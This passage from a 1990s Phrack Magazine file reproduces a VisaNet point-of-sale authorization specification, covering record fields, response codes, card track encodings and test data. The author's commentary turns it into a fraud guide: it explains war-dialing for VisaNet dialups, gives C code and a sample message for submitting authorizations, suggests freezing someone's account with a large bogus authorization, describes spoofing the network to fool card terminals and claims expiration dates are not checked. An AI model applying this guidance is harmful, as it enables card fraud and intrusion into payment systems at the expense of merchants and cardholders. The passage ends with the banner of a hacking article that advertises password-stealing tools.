                 Volume Five, Issue Forty-Six, File 16 of 28

****************************************************************************

                        VisaNet Operations (Continued)

4.22 TRANSACTION AMOUNT

This is a variable field from three to twelve digits in length.  The transaction
amount includes the amount in 4.28, Secondary Amount.  Therefore, field 4.22
must be greater than or equal to field 4.28.

The transaction amount is presented by the terminal with an implied decimal
point.  For example $.01 would be represented in the record as "001".  When the
terminal is used with an authorization system which supports the US dollar as
the primary currency, the amount field must be limited to seven digits
(9999999). [...]  The terminal may be used with authorization system which
support other currencies that require the full twelve-digit field.

4.23 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.24 DEVICE CODE/INDUSTRY CODE

This field is used to identify the device type which generated the transaction
and the industry type of the merchant.  Table 4.24 provides a brief summary of
the current codes.

                                   TABLE 4.24
                           Device Code/Industry Code

C                                      C
O                                      O
D                                      D
E          DEVICE TYPE                 E            INDUSTRY TYPE
-------------------------------------------------------------------------------
0   Unknown or Unsure                  0   Unknown or Unsure
1          RESERVED                    1              RESERVED
2          RESERVED                    2              RESERVED
3          RESERVED                    3              RESERVED
4          RESERVED                    4              RESERVED
5          RESERVED                    5              RESERVED
6          RESERVED                    6              RESERVED
7          RESERVED                    7              RESERVED
8          RESERVED                    8              RESERVED
9          RESERVED                    9              RESERVED
A          RESERVED                    A              RESERVED
B          RESERVED                    B   Bank/Financial Institution
C   P.C.                               C              RESERVED
D   Dial Terminal                      D              RESERVED
E   Electronic Cash Register (ECR)     E              RESERVED
F          RESERVED                    F   Food/Restaurant
G          RESERVED                    G   Grocery Store/Supermarket
H          RESERVED                    H   Hotel
I   In-Store Processor                 I              RESERVED
J          RESERVED                    J              RESERVED
K          RESERVED                    K              RESERVED
L          RESERVED                    L              RESERVED
M   Main Frame                         M   Mail Order
N          RESERVED                    N              RESERVED
O          RESERVED                    O              RESERVED
P   POS-port                           P              RESERVED
Q       RESERVED for POS-port          Q              RESERVED
R          RESERVED                    R   Retail
S          RESERVED                    S              RESERVED
T          RESERVED                    T              RESERVED
U          RESERVED                    U              RESERVED
V          RESERVED                    V              RESERVED
W          RESERVED                    W              RESERVED
X          RESERVED                    X              RESERVED
Y          RESERVED                    Y              RESERVED
Z          RESERVED                    Z              RESERVED
--------------------------------------------------------------------------------

4.25 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID

This six-digit field is provided by the merchant signing member and is present
when the terminal is used to process transactions which can not be routed using
the cardholder Primary Account Number.  When a value is present in this field,
it is used as an RIID for all valid transaction codes, field 4.12, except 81
through 88.  This field is used as an IIID for transaction codes 81 through 88.
Table 4.26 provides a summary of the RIID codes for check acceptance.

                                   TABLE 4.26
                          Check Acceptance RIID Values

                         Vendor                 RIID
                         ---------------------------
                         JBS, Inc             810000
                         Telecheck            861400
                         TeleCredit, West     894300 [note; telecredit has been
                         TeleCredit, East     894400  mutated/eaten by equifax]
                         ---------------------------

4.27 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.28 SECONDARY AMOUNT (CASHBACK)

NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field,
see section 4.18, has been manually entered.

This is a variable length field from three to twelve digits in length.  The
Secondary Amount is included in field 4.22, Transaction Amount.

The secondary amount is presented by the terminal with an implied decimal point.
For example $.01 would be represented in the record as "001".  This field will
contain 000 when no secondary amount has been requested.  Therefore, when the
terminal is used with an authorization system which supports the US dollar as
the primary currency, the secondary amount field must be limited to seven
digits (9999999).  The terminal may be used with authorization systems which
support other currencies that require the full twelve-digit field.

4.29 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.30 MERCHANT NAME

This 25-character field contains the merchant name provided by the signing
member.  the name must correspond to the name printed on the customer receipt.
The name is left justified with space fill.  The first character position can
not be a space.  This field must contain the same used in the data capture
batch.

4.32 MERCHANT STATE

This two-character field contains the merchant location state abbreviation
provided by the singing member.  The abbreviation must correspond to the state
name printed on the customer receipt and be one of the Visa accepted
abbreviations.  This field must contain the same data used in the data capture
batch.

4.33 SHARING GROUP

This one to fourteen-character field contains the group of debit card/network
types that a terminal may have access to and is provided by the singing member.
The values must correspond to one of the Visa assigned debit card /network
types.  This data is part of the VisaNet debit data.

4.34 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.35 MERCHANT ABA NUMBER

This fixed length field is twelve digits in length.  If this field is not used,
its length must be zero.  If this field is not used, the following field must
also be empty.

This number identifies the merchant to a debit switch provided by the signing
member.  The number is provided by the signing member.

4.36 MERCHANT SETTLEMENT AGENT NUMBER

This fixed length field is four digits in length.  If this field is not used,
its length must be zero.  If this field is not used, the previous field must
also be empty.

This number identifies the merchant settling agent.  The number is provided by
the signing member.

4.37 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.38 AGENT NUMBER

This six-digit field contains an agent number assigned by the signing member.
The number identifies an institution which signs merchants as an agent of a
member.  The member uses this number to identify the agent within the member
systems.  The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers
are required to uniquely identify a terminal within the VisaNet systems.

4.39 CHAIN NUMBER

This six-digit field contains a merchant chain identification number assigned
by the singing member.  The member uses this number to identify the merchant
chain within the member systems.  The acquirer BIN, Agent, Chain, Merchant,
Store, and Terminal numbers are required to uniquely identify a terminal within
the VisaNet systems.

4.40 BATCH NUMBER

This three-digit field contains a batch sequence number generated by the
terminal.  The number will wrap from 999 to 001.  This number is that data
capture batch number.

4.41 REIMBURSEMENT ATTRIBUTE

This is a single character fixed length field.

This field contains the reimbursement attribute assigned by the singing member.
This field must be a "space".

4.42 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.43 APPROVAL CODE

This contains a six-character fixed length field.

This field is only present in cancel transactions and contains the original
approval code from the original transaction.

The approval code was returned in the authorization response of the transaction
to be canceled.

4.44 SETTLEMENT DATE

This contains a four-digit fixed length field.

This field is only present in cancel transactions and contains the settlement
date from the original transaction and is in the format MMDD.

The settlement date was returned in the authorization response of the
transaction to be canceled.

4.45 LOCAL TRANSACTION DATE

This contains a four-digit fixed length field.

This field is only present in cancel transactions and contains the transaction
date from the original transaction and is in the format MMDD.

The transaction date was returned in the authorization response of the
transaction to be canceled as MMDDYY.

4.46 LOCAL TRANSACTION TIME

This contains a six-digit fixed length field.

This field is only present in cancel transactions and contains the transaction
time from the original transaction and is in the format HHMMSS.

The transaction time was returned in the authorization response of the
transaction to be canceled.

4.47 SYSTEM TRACE AUDIT NUMBER

This contains a six-character fixed length field.

This field is only present in cancel transactions and contains the trace audit
number from the original transaction.

The trace audit number was returned in the authorization response of the
transaction to be canceled.

4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE

The field is a two-character fixed length field and must contain the original
AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled.
Currently, the only transaction that can be canceled in an Interlink Debit
Purchase.

4.49 NETWORK IDENTIFICATION CODE

This contains a single character fixed length field.

This field is only present in cancel transactions and contains the network ID
from the original transaction.

The network ID was returned in the authorization response of the transaction to
be canceled.

4.50 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS

The following subsections will define the authorization response record data
elements.

5.01 PAYMENT SERVICE INDICATOR

This field contains the one-character payment service indicator.  It must be
placed in the batch detail record for terminals that capture.

Table 5.01 provides a summary of current Values.

                                   TABLE 5.01
                        Payment Service Indicator Values

        VALUE   DESCRIPTION
        ------------------------------------------------------------------
          A     REPS qualified
          Y     Requested a "Y" in field 4.14 and there was a problem
                REPS denied (VAS edit error or BASE I reject)
          N     Requested an "N" in field 4.14 or requested a "Y" in field
                4.14 and request was downgraded (by VAS)
        space   If "Y" sent and transaction not qualified  (VAS downgrade)
        -------------------------------------------------------------------

5.02 STORE NUMBER

This four-digit number is returned by VisaNet from the authorization request for
formats "J" and "G", and can be used to route the response within a store
controller and/or a store concentrator.

5.03 TERMINAL NUMBER

This four-digit number is returned by VisaNet from the authorization request for
formats "J" and "G", and can be used to route the response within a store
controller and/or a store concentrator.

5.04 AUTHORIZATION SOURCE CODE

This field contains a one-character code that indicates the source of the
authorization.  The received code must be placed in the data capture detail
transaction record when data capture is enabled.

Table 5.04 provides a summary of current codes.

                                   TABLE 5.04
                           Authorization Source Codes

 Code   Description
--------------------------------------------------------------------------------
  1     STIP: time-out response
  2     LCS: amount below issuer limit
  3     STIP: issuer in Suppress-Inquiry mode
  4     STIP: issuer unavailable
  5     Issuer approval
  6     Off-line approval, POS device generated
  7     Acquirer approval: BASE I unavailable
  8     Acquirer approval of a referral
  9     Use for non-authorized transactions; such as credit card credits [yum!]
  D     Referral: authorization code manually keyed
  E     Off-line approval: authorization code manually keyed
--------------------------------------------------------------------------------

5.05 TRANSACTION SEQUENCE NUMBER

This field contains the four-digit code which was generated by the terminal as
the sequence number for the transaction and passed to the authorization center
in the authorization request record.  The sequence number can be used by the
terminal to match request and response messages.  The transaction sequence
number is returned by VisaNet without sequence verification.

5.06 RESPONSE CODE

This field contains a two-character response code indicating the status of the
authorization.

Table 5.06 provides the response codes for formats "J" and "G".  A response code
of "00" represents an approval.  A response code of "85" represents a successful
card verification returned by TRANSACTION CODES 58, 68, and 88.  All other
response codes represent a non-approved request.

The value returned is stored in the batch transaction detail record for
terminals that capture.

                                   TABLE 5.06
           Authorization Response Codes For Record Formats "J" & "G"

  Authorization     Response                                        AVS Result
 Response Message     Code       Response Definition                   Code
--------------------------------------------------------------------------------
   EXACT MATCH         00        Exact Match, 9 digit zip               X
   EXACT MATCH         00        Exact Match, 5 digit zip GRIND         Y
  ADDRESS MATCH        00        Address match only                     A
    ZIP MATCH          00        9-digit zip match only                 W
    ZIP MATCH          00        5-digit zip match only GRIND           Z
     NO MATCH          00        No address or zip match                N
 VER UNAVAILABLE       00        Address unavailable                    U
      RETRY            00        Issuer system unavailable              R
 ERROR INELIGIBLE      00        Not a mail/phone order                 E
 SERV UNAVAILABLE      00        Service not supported                  S
    APPROVAL           00        Approved and completed              see above
     CARD OK           85        No reason to decline                see above
      CALL             01        Refer to issuer                        0
      CALL             02        Refer to issue - Special condition     0
    NO REPLY           28        File is temporarily unavailable        0
    NO REPLY           91        Issuer or switch is unavailable        0
    HOLD-CALL          04        Pick up card                           0
    HOLD-CALL          07        Pick up card - Special condition       0
    HOLD-CALL          41        Pick up card - Lost                    0
    HOLD-CALL          43        Pick up card - Stolen                  0
 ACCT LENGTH ERR       EA        Verification Error                     0
 ALREADY REVERSED      79        Already Reversed at Switch [ya got me] 0
   AMOUNT ERROR        13        Invalid amount                         0
  CAN'T VERIFY PIN     83        Can not verify PIN                     0
   CARD NO ERROR       14        Invalid card number                    0
  CASHBACK NOT APP     82        Cashback amount not approved           0
   CHECK DIGIT ERR     EB        Verification Error                     0
  CID FORMAT ERROR     EC        Verification Error                     0
     DATE ERROR        80        Invalid Date                           0
      DECLINE          05        Do not honor                           0
      DECLINE          51        Not Sufficient Funds                   0
      DECLINE          61        Exceeds Withdrawal Limit               0
      DECLINE          65        Activity Limit Exceeded                0
 ENCRYPTION ERROR      81        Cryptographic Error                    0
      ERROR xx         06        General Error                          0
     ERROR xxxx        06        General Error                          0
    EXPIRED CARD       54        Expired Card                           0
  INVALID ROUTING      98        Destination Not Found                  0
   INVALID TRANS       12        Invalid Transaction                    0
  NO CHECK ACCOUNT     52        No Check Account                       0
  NO SAVE ACCOUNT      54        No Save Account                        0
   NO SUCH ISSUER      15        No Such Issuer                         0
      RE ENTER         19        Re-enter Transaction                   0
    SEC VIOLATION      63        Security Violation                     0
   SERV NOT ALLOWED    57        Trans. not permitted-Card              0
   SERV NOT ALLOWED    58        Trans. not permitted-Terminal          0
   SERVICE CODE ERR    62        Restricted Card                        0
     SYSTEM ERROR      96        System Malfunction [whoop whoop!]      0
     TERM ID ERROR     03        Invalid Merchant ID                    0
      WRONG PIN        55        Incorrect PIN                          0
  xxxxxxxxxxxxxxxxxx   xx        Undefined Response                     0
--------------------------------------------------------------------------------

5.07 APPROVAL CODE

This field contains a six-character code when a transaction has been approved.
If the transaction is not approved the contents of the field should be ignored.
The approval code is input to the data capture detail transaction record.

5.08 LOCAL TRANSACTION DATE

This field contains a six-digit local date calculated (MMDDYY) by the
authorization center using the time zone differential code provided in the
authorization request message.  This date is used by the terminal as the date to
be printed on the transaction receipts and audit reports, and as the date input
to the data capture transaction detail record.  This field is only valid for
approved transactions.

5.09 AUTHORIZATION RESPONSE MESSAGE

This field is a sixteen-character field containing a response display message.
This message is used by the terminal to display the authorization results.
Table 5.06 provides the message summary.   The messages are provided with "sp"
space fill.  This field is mapped to the RESPONSE CODE, field 5.06, for all
non-AVS transactions and for all DECLINED AVS transactions.  For APPROVED AVS
transactions (response code = "00" or "85"), it is mapped to the AVS RESULT
CODE, field 5.10.

5.10 AVS RESULT CODE

This one-character field contains the address verification result code.  An
address verification result code is provided for transactions and provides an
additional indication that the card is being used by the person to which the
card was issued.  The service is only available for mail/phone order
transactions.

Table 5.06 provides a summary of the AVS Result Codes.

An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined
transactions.

5.11 TRANSACTION IDENTIFIER

This numeric field will contain a transaction identifier.  The identifier will
be fifteen-digits in length if the payment service indicator value is an "A" or
it will be zero in length if the payment service indicator value is not an "A".
This value is stored in the batch detail record for terminals that capture and
is mandatory for REPS qualification.

5.12 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

5.13 VALIDATION CODE

This alphanumeric field will contain a validation code.  The code will contain a
four-character value if the payment service indicator value is an "A" or it will
be zero in length if the payment service indicator value is not an "A".  This
value is stored in the batch detail record for terminals that capture and is
mandatory for REPS qualification.

5.14 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

5.15 NETWORK IDENTIFICATION CODE

This one-character fixed length field contains the identification code of the
network on which the transaction was authorized.  The network ID must be printed
on the receipt.

5.16 SETTLEMENT DATE

This four-digit fixed length field contains the transaction settlement date
returned by the authorizing system (MMDD).  The settlement date must be printed
on the receipt.

5.17 SYSTEM TRACE AUDIT NUMBER

This six-character fixed length field contains a trace audit number which is
assigned by the authorizing system.  The trace audit number must be printed on
the receipt.

5.18 RETRIEVAL REFERENCE NUMBER

This twelve-character fixed length field contains the transaction retrieval
reference number returned by the authorizing system.  The reference number
should be printed on the receipt.

5.19 LOCAL TRANSACTION TIME

This six-digit fixed length field contains the transaction time returned by the
authorizing system (HHMMSS).  The time must be printed on the receipt.

6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS

The following subsections define the debit confirmation response record data
elements.

6.01 NETWORK IDENTIFICATION CODE

This one character fixed length field contains the identification code of the
network on which the transaction was authorized.  The network ID is printed on
the receipt.

6.02 SETTLEMENT DATE

This four-digit fixed length field contains the transaction settlement date
returned by the authorizing system.

6.03 SYSTEM TRACE AUDIT NUMBER

This six-character fixed length field contains the system trace audit number
which is assigned by the authorizing system.

7.0 CHARACTER CODE DEFINITIONS

The following subsections will define the authorization request record character
set and character sets used for track 1 and track 2 data encoded on the magnetic
stripes.

The authorization request records are generated with characters defined by ANSI
X3.4-1986.  The data stored on the cardholder's card in magnetic or optical form
must be converted to the ANSI X3.4 character set before transmission to VisaNet.

Section 7.01 provides track 1 character set definition.  Section 7.02 provides
track 2 character set definition.  Section 7.03 provides the ANSI X3.4-1986 and
ISO 646 character set definitions.  Section 7.04 provides a cross reference
between the track 1, track 2, and ANSI X3.4 character sets.  Section 7.05
describes the method for generating and checking the Mod 10 Luhn check digit for
credit card account numbers.  Section 7.06 describes the method for generating
the LRC byte for the authorization request message and for testing the card
swipe's LRC byte.  Section 7.07 provides sample data for an authorization
request and response for record format "J" testing.

The POS device/authorization must perform the following operations on track
read data before it can be used in an authorization request message.

   1. The LRC must be calculated for the data read from the track and compared
      to the LRC read from the track.  The track data is assumed to be read
      without errors when on character parity errors are detected and the
      calculated and read LRC's match.

   2. The starting sentinel, ending sentinel, and LRC are discarded.

   3. The character codes read from the magnetic stripe must be converted from
      the encoded character set to the set used for the authorization request
      message.  The characters encoded on track 1 are six-bit plus parity codes
      and the characters encoded on track 2 are four-bit plus parity codes, with
      the character set used for the request message defined as seven-bit plus
      parity codes.

All characters read from a track must be converted to the request message
character set and transmitted as part of the request.  The converted track data
can not be modified by adding or deleting non-framing characters and must be a
one-for-one representation of the characters read from the track.  [sounds like
they mean it, eh?]

7.1 TRACK 1 CHARACTER DEFINITION

Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions.  This
"standards" format is a SAMPLE guideline for expected credit card track
encoding; ATM/debit cards may differ.  Actual cards may differ [not], whether
they are Visa cards or any other issuer's cards.

Each character is defined by the six-bit codes listed in Table 7.01.

Track 1 can be encoded with up to 79 characters as shown in Figure 7.01

+---------------------------------------------------------+
|SS|FC| PAN|FS|  NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC|
+---------------------------------------------------------+

LEGEND:

             Field  Description                                  Length  Format
--------------------------------------------------------------------------------
                SS  Start Sentinel                                 1        %
                FC  Format Code ("B" for credit cards)             1       A/N
               PAN  Primary Account Number                      19 max     NUM
                FS  Field Separator                                1        ^
              NAME  Card Holder Name (See NOTE below)           26 max     A/N
                FS  Field Separator                                1        ^
              DATE  Expiration Date (YYMM)                         4       NUM
Discretionary Data  Option Issuer Data (See NOTE below)         variable   A/N
                ES  End Sentinel                                   1        ?
               LRC  Longitudinal Redundancy Check                  1
                                                                  ---
                    Total CAN NOT exceed 79 bytes----->           79
--------------------------------------------------------------------------------

                                  FIGURE 7.01
                          Track 1 Encoding Definition

NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator
      and a "." as the title separator

      The DISCRETIONARY DATA can contain any of the printable characters from
      Table 7.01

                                   TABLE 7.01
                          Track 1 Character Definition

                       b6   0   0   1   1
BIT NUMBER             b5   0   1   0   1      (a) These character positions
-------------------------------------------        are for hardware use only
b4 b3 b2 b1    ROW/COL      0   1   2   3
-------------------------------------------    (b) These characters are for
0  0  0  0        0        SP   0  (a)  P          country use only, not for
0  0  0  1        1        (a)  1   A   Q          international use
0  0  1  0        2        (a)  2   B   R
0  0  1  1        3        (c)  3   C   S      (c) These characters are
0  1  0  0        4         $   4   D   T          reserved for added
0  1  0  1        5        (%)  5   E   U          graphic use [nifty]
0  1  1  0        6        (a)  6   F   V
0  1  1  1        7        (a)  7   G   W
1  0  0  0        8         (   8   H   X      (%) Start sentinel
1  0  0  1        9         )   9   I   Y      (/) End sentinel
1  0  1  0        A        (a) (a)  J   Z      (^) Field Separator
1  0  1  1        B        (a) (a)  K  (b)      /  Surname separator
1  1  0  0        C        (a) (a)  L  (b)      .  Title separator
1  1  0  1        D         -  (a)  M  (b)      SP Space
1  1  1  0        E         -  (a)  N  (^)      +-----------------------+
1  1  1  1        F         /  (?)  O  (a)      |PAR|MSB|B5|B4|B3|B2|LSB|
                                                +-+---+-----------------+
                                                  |   |--- Most Significant Bit
                                                  |--- Parity Bit (ODD)
                                               Read LSB First

7.02 TRACK 2 CHARACTER DEFINITION

Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions.  This
"standards" format is a SAMPLE guideline for expected credit card track
encoding; ATM/debit cards may differ.  Actual cards may differ, whether they are
Visa cards or any other issuer's cards.

Each character is defined by the four-bit codes listed in Table 7.02.

Track 2 can be encoded with up to 40 characters as shown in Figure 7.02.

+--------------------------------------------------------+
|SS|    PAN   |FS| DATE|    DISCRETIONARY DATA    |ES|LRC|
+--------------------------------------------------------+

LEGEND:

             Field  Description                                  Length  Format
--------------------------------------------------------------------------------
                SS  Start Sentinel                                 1     0B hex
               PAN  Primary Account Number                      19 max     NUM
                FS  Field Separator                                1        =
Discretionary Data  Option Issuer Data (See NOTE below)         variable   A/N
                ES  End Sentinel                                   1     0F hex
               LRC  Longitudinal Redundancy Check                  1
                                                                  ---
                    Total CAN NOT exceed 40 bytes----->           40
--------------------------------------------------------------------------------

                                  FIGURE 7.02
                          Track 2 Encoding Definition

NOTE: The PAN and DATE are always numeric.  The DISCRETIONARY DATA can be
      numeric with optional field separators as specified in Table 7.02.


                                   TABLE 7.02
                             Track 2 Character Set

b4  b3  b2  b1     COL              (a) These characters are for
------------------------------          hardware use only
0   0   0   0       0      0
0   0   0   1       1      1        (B) Starting Sentinel
0   0   1   0       2      2
0   0   1   1       3      3        (D) Field Separator
0   1   0   0       4      4
0   1   0   1       5      5        (F) Ending Sentinel
0   1   1   0       6      6
0   1   1   1       7      7
1   0   0   0       8      8        +---------------------------+
1   0   0   1       9      9        | PAR | MSB | b3 | b2 | LSB |
1   0   1   0       A     (a)       +---------------------------+
1   0   1   1       B     (B)          |     |
1   1   0   0       C     (a)          |     |--- Most Significant Bit
1   1   0   1       D     (D)          |--- Parity Bit (ODD)
1   1   1   0       E     (a)
1   1   1   1       F     (F)        Read LSB first

[ tables 7.03a, 7.03b, and 7.04 deleted...
  If you really need a fucking ascii table that bad go buy a book.]

[ section 7.05 - Account Data Luhn Check deleted...
  as being unnecessary obtuse and roundabout in explaining how the check works.
  the routine written by crazed luddite and murdering thug is much clearer. ]

7.06 CALCULATING AN LRC

When creating or testing the LRC for the read of the card swipe, the
authorization request record, the debit confirmation record or the VisaNet
response record; use the following steps to calculate the LRC:

1) The value of each bit in the LRC character, excluding the parity bit, is
   defined such that the total count of ONE bits encoded in the corresponding
   bit location of all characters of the data shall be even (this is also known
   as an EXCLUSIVE OR (XOR) operation)

      For card swipes, include the start sentinel, all the data read and
      the end sentinel.

      For VisaNet protocol messages, begin with the first character past
      the STX, up to and including the ETX.

2) The LRC characters parity bit is not a parity bit for the individual parity
   bits of the data message, but it only the parity bit for the LRC character
   itself.  Calculated as an even parity bit.

[ i list a routine for calculating an LRC o a string later on in the document ]

7.07 TEST DATA FOR RECORD FORMAT "J"

The following two sections provide sample data for testing record format "J"
with the VisaNet dial system.

7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST

Table 7.07a provides a set of test data for record format "J" authorization
request.

                                  TABLE 7.07a
                        Test Data For Record Format "J"

 Test Data      Byte #   Length   Format   Field Name
--------------------------------------------------------------------------------
     J            1         1       A/N    Record Format
 0, 2, or 4       2         1       A/N    Application Type
     .            3         1       A/N    Message Delimiter
   401205        4-9        6       A/N    Acquirer BIN
123456789012    10-21       12      NUM    Merchant Number
    0001     *  22-25       4       NUM    Store Number
    0001     *  26-29       4       NUM    Terminal Number
    5999        30-33       4       NUM    Merchant Category Code
    840         34-36       3       NUM    Merchant Country Code
   94546        37-41       5       A/N    Merchant City Code
    108         42-44       3       NUM    Time Zone Differential
    54          45-46       2       A/N    Authorization Transaction Code
  12345678      47-54       8       NUM    Terminal Identification Number
     Y           55         1       A/N    Payment Service Indicator
    0001     *  56-59       4       NUM    Transaction Sequence Number
     @           60         1       A/N    Cardholder Identification Code
D, H, T, or X    61         1       A/N    Account Data Source
 Track or                                  Customer Data Field
Manual Data
    "FS"        N.A.        1       "FS"   Field Separator
  0000123       N.A.      0 to 43   A/N    Transaction Amount
    "FS"        N.A.        1       "FS"   Field Separator
     ER         N.A.      0 or 2    A/N    Device Code/Industry code
    "FS"        N.A.        1       "FS"   Field Separator
                N.A.      0 or 6    NUM    Issuing/Receiving Institution ID
    "FS"        N.A.        1       "FS"   Field Separator
    000         N.A.      3 to 12   NUM    Secondary Amount (Cashback)
    "FS"        N.A.        1       "FS"   Field Separator
--------------------------------------------------------------------------------

NOTE:* Denotes fields that are returned in the response message

7.07.2 RESPONSE MESSAGE FOR TEST DATA

Table 7.07b provides the response message for the test data provided in section
7.07.1.

                                  TABLE 7.07b
               Response Message For Test Data - Record Format "J"

 Test Data      Byte #   Length   Format   Field Name
--------------------------------------------------------------------------------
A, Y, N, or   *   1        1       A/N     Payment Service Indicator
 "space"
   0001       *  2-5       4       NUM     Store Number
   0001       *  6-9       4       NUM     Terminal Number
    5         *   1        1       A/N     Authorization Source Code
   0001       * 11-14      4       NUM     Transaction Sequence Number
    00        * 15-16      2       A/N     Response Code
  12AB45      * 17-22      6       A/N     Approval Code
  111992      * 23-28      6       NUM     Transaction Date (MMDDYY)
AP ______       29-44      16      A/N     Authorization Response Message
0, Sp, or "FS"   45        1       A/N     AVS Result Code
              *Variable  0 or 15   NUM     Transaction Identifier
    "FS"                           "FS"    Field Separator
              *Variable  0 or 4    A/N     Validation Code
    "FS"                           "FS"    Field Separator
--------------------------------------------------------------------------------
NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)
--------------------------------------------------------------------------------

                                [ section two ]
                              [ finding visanet ]

finding visanet isn't hard, but it can be tedious.  visanet rents time off of
compuserve and X.25 networks.  the compuserve nodes used are not the same
as their information service, cis.  to identify a visanet dialup after
connecting, watch for three enq characters and a three second span to hangup.
if you've scanned out a moderate portion of your area code, you probably have a
few dialups.  one idea is to write a short program to dial all the connects you
have marked as garbage or worthless [ you did keep em, right? ]  and wait
for the proper sequence.  X.25 connections should work similarly, but i don't
know for sure.  read the section on visanet usage for other dialup sources.

                                [ section three ]
                        [ visanet link level protocol ]

messages to/from visanet have a standard format:

    stx - message - etx - lrc

the message portion is the record formats covered in section one.  lrc values
are calculated starting with the first byte of message, going up to and
including the etx character.  heres an algorithm that calculates the lrc for a
string. note: in order to work with the visanet protocols, append etx to the
string before calling this function.

unsigned char func_makelrc(char *buff)
{
   int i;
   char ch, *p;

   ch = 0;
   p = buff;

   for(;;)  {
      ch = (ch^(*p));
      p++;
      if(!(*p))
         break;
   }

   return ch;
}

for a single authorization exchange, the easiest kind of transaction, the
sequence goes like this:

host   enq                   stx-response-etx-lrc   eot
term      stx-request-etx-lrc                    ack
                                                          <disconnect>

matching this sequence with test record formats from section one, 7.07, heres
an ascii representation of a transaction.  control characters denoted in <>'s.
[of course, you wouldn't really have a carriage return in middle of a message.
duh. ]  this transaction would be for card number 4444111122223333 with an
expiration date of 04/96.  the purchase amount is $1.23.  visanet responds with
an approval code of 12ab45.

host: <enq>

term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411
      1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc>

host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs>
      ABCD<fs><etx><lrc>

term: <ack>

host: <eot>

authorizing multiple transactions during one connect session is only slightly
more complicated.  the etx character on all messages sent to visanet are changed
to etb and the application type is changed from '0' to '2' [section one 4.02].
instead of responding after a transaction with eot, visanet instead polls the
terminal again with enq.  this continues until the terminal either changes back
to the single transaction format or issues an eot to the host.

heres a short list of all control characters used:

stx: start-of-text, first message framing character signaling message start
etx: end-of-text, the frame ending character the last message of a sequence
eot: end-of-transmission, used to end an exchange and signal disconnect
enq: enquiry, an invitation to transmit a message or retransmit last item
ack: affirmative acknowledgment, follows correct reception of message
nak: negative acknowledgment, used to indicate that the message was not
     understood or was received with errors
syn: delay character, wait thirty seconds
etb: end-of-block, the end framing character used to signal the end of a message
     within a multiple message sequence

other quick notes: visanet sometimes sends ack before stx on responses
                   lrc characters can hold any value, such as stx, nak, etc
                   visanet can say goodbye at any time by sending eot
                   people can get very anal about error flow diagrams

                                [ section four ]
                    [ half the story; central data capture ]

a full transaction requires two steps, one of which is described in this
document: getting the initial authorization.  an authorization does basically
nothing to a person's account.  oh, you could shut somebody's account down for
a day or two by requesting a twenty thousand dollar authorization, but no other
ill effects would result.  central data capture, the second and final step in a
transaction, needs information from both the authorization request and
response, which is used to generate additional data records.  these records are
then sent to visanet by the merchant in a group, usually at the end of each day.

                                [ section five ]
                            [ common applications ]

access to visanet can be implemented in a number of ways: directly on a pos
terminal, indirectly via a lan, in a hardware specific device, or any
permutation possible to perform the necessary procedures.  card swipers commonly
seen at malls are low tech, leased at around fifty dollars per month, per
terminal.  they have limited capacity, but are useful in that all of the
information necessary for transactions is self contained.  dr delam and maldoror
found this out, and were delighted to play the role of visanet in fooling the
little device.  close scrutiny of section one reveals atm formats, phone order
procedures, and new services such as direct debit from checking/savings and
checks by phone.  start noticing the stickers for telecheck and visa atm cards,
and you're starting to get the picture.

                               [ section seven ]
                              [ brave new world ]

could it be?  yes, expiration dates really don't matter....
this article written to thank previous Phrack writers...
please thank me appropriately...
800#s exist...
other services exist... mastercard runs one...
never underestimate the power of asking nicely...
numerous other formats are available... see section one, 3.0 for hints...
never whistle while you're pissing...


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Five, Issue Forty-Six, File 17 of 28

****************************************************************************

[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
[<>                                                                     <>]
[<>   ----+++===:::  GETTiN' D0wN 'N D1RTy wiT Da GS/1  :::===+++----   <>]
[<>                                                                     <>]
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
[<>                                                                     <>]
[<>                        Brought to you by:                           <>]
[<>        [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT          <>]
[<>                                                                     <>]
[<>        Story line: Maldoror -n- [)r. [)elam                         <>]
[<>        Main Characters: Menacing Maldoror & The Evil [)r. [)elam    <>]
[<>        Unix Technical Expertise: Wunder-Boy [)elam                  <>]
[<>        Sysco Technishun: Marvelous Maldoror                         <>]
[<>                                                                     <>]
[<>        Look for other fine [)elamo Labz and ChURcH oF ThE           <>]
[<>        Non-CoNForMisT products already on the market such as        <>]
[<>        DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's      <>]
[<>        Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet       <>]
[<>        skanner for Telix), PREFIX (Maldoror's telephone prefix      <>]
[<>        identification program), and various other programs and      <>]
[<>        philez written by Dr. Delam, Maldoror, Green Paradox,        <>]
